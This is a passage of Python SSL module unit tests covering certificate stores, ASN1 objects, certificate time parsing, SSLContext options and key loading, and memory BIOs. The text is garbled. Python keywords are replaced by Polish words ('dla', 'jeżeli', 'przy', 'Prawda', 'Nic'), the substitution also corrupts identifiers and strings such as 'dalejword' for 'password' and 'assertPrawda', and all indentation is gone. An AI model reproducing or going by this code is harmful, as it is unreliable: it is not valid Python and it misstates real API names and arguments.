self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
dla storename w ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
dla element w store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
jeลผeli isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertPrawda(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
dla element w crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
przy self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
dla i w range(1000):
sprรณbuj:
obj = ssl._ASN1Object.fromnid(i)
wyjฤ
wszy ValueError:
dalej
inaczej:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(Nic)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
przy self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
przy self.assertRaises(NotImplementedError) jako cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
przy self.assertRaises(NotImplementedError) jako cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
przy self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different z UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results jeลผeli local timezone jest nie UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e oraz %d (space albo zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # nie GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even jeลผeli it jest nie a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second dla compatibility przy time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement dla the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
zwrรณฤ time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
jeลผeli local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different z C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
klasa ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
dla protocol w PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
dla proto w PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
przy self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 jest the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2,
ctx.options)
ctx.options |= ssl.OP_NO_SSLv3
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
jeลผeli can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
inaczej:
przy self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
przy self.assertRaises(TypeError):
ctx.verify_mode = Nic
przy self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
przy self.assertRaises(TypeError):
ctx.verify_flags = Nic
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key oraz cert w a single file
ctx.load_cert_chain(CERTFILE, keyfile=Nic)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
przy self.assertRaises(OSError) jako cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
przy self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
przy self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key oraz cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
przy self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
przy self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
przy self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key oraz cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
# Password protected key oraz cert
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
dalejword=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
przy self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=Prawda)
przy self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword="badpass")
przy self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the dalejword buffer.
# PEM_BUFSIZE jest generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=b'a' * 102400)
# Password callback
def getpass_unicode():
zwrรณฤ KEY_PASSWORD
def getpass_bytes():
zwrรณฤ KEY_PASSWORD.encode()
def getpass_bytearray():
zwrรณฤ bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
zwrรณฤ "badpass"
def getpass_huge():
zwrรณฤ b'a' * (1024 * 1024)
def getpass_bad_type():
zwrรณฤ 9
def getpass_exception():
podnieล Exception('getpass error')
klasa GetPassCallable:
def __call__(self):
zwrรณฤ KEY_PASSWORD
def getpass(self):
zwrรณฤ KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
dalejword=GetPassCallable().getpass)
przy self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=getpass_badpass)
przy self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=getpass_huge)
przy self.assertRaisesRegex(TypeError, "must zwrรณฤ a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=getpass_bad_type)
przy self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, dalejword=getpass_exception)
# Make sure the dalejword function isn't called jeลผeli it isn't needed
ctx.load_cert_chain(CERTFILE, dalejword=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=Nic)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=Nic)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, Nic, Nic, Nic)
przy self.assertRaises(OSError) jako cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
przy self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash jeลผeli the second argument type jest invalid
self.assertRaises(TypeError, ctx.load_verify_locations, Nic, Prawda)
def test_load_verify_cadata(self):
# test cadata
przy open(CAFILE_CACERT) jako f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
przy open(CAFILE_NEURONIO) jako f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already w hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# przy junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already w hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
przy self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
przy self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
jeลผeli os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, Nic)
przy self.assertRaises(FileNotFoundError) jako cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
przy self.assertRaises(ssl.SSLError) jako cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
dla proto w PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's nie much we can do to test that it acts jako expected,
# so just check it doesn't crash albo podnieล an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, Nic)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, albo Nic
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
dalej
ctx.set_servername_callback(Nic)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# oraz cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
dalej
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
usuล ctx, dummycallback
gc.collect()
self.assertIs(wr(), Nic)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE jest nie flagged jako X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but SVN_PYTHON_ORG_ROOT_CERT jest a CA cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
przy open(SVN_PYTHON_ORG_ROOT_CERT) jako f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(Prawda), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, Nic)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy support.EnvironmentVarGuard() jako env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy support.EnvironmentVarGuard() jako env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertPrawda(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
przy open(SIGNING_CA) jako f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertNieprawda(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=Prawda)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertPrawda(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertNieprawda(ctx.check_hostname)
# Requires CERT_REQUIRED albo CERT_OPTIONAL
przy self.assertRaises(ValueError):
ctx.check_hostname = Prawda
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertNieprawda(ctx.check_hostname)
ctx.check_hostname = Prawda
self.assertPrawda(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = Prawda
self.assertPrawda(ctx.check_hostname)
# Cannot set CERT_NONE przy check_hostname enabled
przy self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = Nieprawda
self.assertNieprawda(ctx.check_hostname)
klasa SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same dla a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library oraz reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy self.assertRaises(ssl.SSLError) jako cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertPrawda(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass jest podnieลd
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy socket.socket() jako s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(Nieprawda)
przy ctx.wrap_socket(c, Nieprawda, do_handshake_on_connect=Nieprawda) jako c:
przy self.assertRaises(ssl.SSLWantReadError) jako cm:
c.do_handshake()
s = str(cm.exception)
self.assertPrawda(s.startswith("The operation did nie complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
klasa MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertNieprawda(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertNieprawda(bio.eof)
bio.write(b'foo')
self.assertNieprawda(bio.eof)
bio.write_eof()
self.assertNieprawda(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertNieprawda(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertPrawda(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertPrawda(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
dla i w range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
dla i w range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
